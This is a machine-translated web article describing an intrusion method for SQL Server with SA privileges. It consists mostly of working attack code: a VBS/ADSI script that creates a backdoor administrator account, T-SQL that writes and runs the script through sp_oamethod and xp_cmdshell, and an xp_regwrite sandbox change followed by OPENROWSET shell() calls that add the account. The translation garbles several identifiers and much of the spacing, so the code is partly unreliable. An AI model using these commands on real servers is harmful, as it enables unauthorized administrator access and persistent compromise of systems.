SQLServerSA permission latest intrusion method _ MySQL

SQLServerSA permission latest intrusion method bitsCN.com

The server administrator or the administrator cannot add an administrator account because net.exeand net1.exe are restricted. We know that VBS has a winnt object in the Active Directory (ADSI) to manage local resources. you can add an administrator without using commands such as CMD. the specific code is as follows:
Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")

OS = "WinNT: //" & wsnetwork. ComputerName

Set ob = GetObject (OS) 'to get the adsi interface, bind

Set oe = GetObject (OS & "/Administrators, group") 'attribute, admin group

Set od = ob. Create ("user", "test") 'creates a user

Od. SetPassword "1234" 'set password

Od. setinfo' save

Set of = GetObject (OS & "/test", user) 'to get the user

Oe. add OS & "/test"

Save the above code as 1.vbsand run the command "cscript 1. vbs". In this way, a user named test and password 1234 will be added to the system. The code executed in the query analyzer is as follows:

Declare @ o int, @ f int, @ t int, @ ret int

Exec sp_oacreate 'scripting. filesystemobject ', @ o out

Exec sp_oamethod @ o, 'createtextfile', @ f out, 'C:/1. vbs ', 1

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set wsnetwork = CreateObject

("WSCRIPT. NETWORK ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL,' OS = "WinNT: //" & wsnetwork.

Computername'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set ob = GetObject (OS )'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set oe = GetObject

(OS & "/Administrators, group ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set od = ob. Create

("User", "test ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'od. SetPassword "1234 "'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'od. setinfo'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set of = GetObject

(OS & "/test", user )'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'Oe. add OS & "/test "'

After the preceding statement is executed, execute the following line of code. this line of code must be executed independently. do not run it with the preceding statement. Otherwise, the prompt "c:/1. vbs is being run by another program, and users cannot be added successfully:

Exec master .. xp_mongoshell 'cscript c:/1. vbs'

If the system user is not added successfully, it may be because the system user's password 1234 is too simple and does not comply with the complex password policy of the server. you can consider the complexity of the settings and then test it. You can also use echo to write the code to 1. vbs. the code format is:

Exec master .. xp_mongoshell 'echo set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")

> 1. vbs'

However, I don't know why all command lines with "&" characters cannot write 1.vbs. if you are interested, try to solve it.

The jet sandbox mode solves the troubles caused by stored procedures such as xp_mongoshell and related dynamic link libraries. For security reasons, the sandbox mode is disabled by default. Therefore, xp_regwrite is required to enable the sandbox mode:

Exec master. dbo. xp_regwrite 'hkey _ LOCAL_MACHINE ', 'software/Microsoft/Jet/4.0

/Engines ', 'sandboxmode', 'Reg _ dword', 1

Then run the sandbox command to add a user with the username test and password 1234 to the system:

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/windows

/System32/ias. mdb ', 'Select shell ("cmd.exe/c net user test 1234/add ")')

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/windows

/System32/ias. mdb ', 'Select shell ("cmd.exe/c net localgroup

Administrators test/add ")')

Different operating systems have different paths and must be modified as needed:

BitsCN.com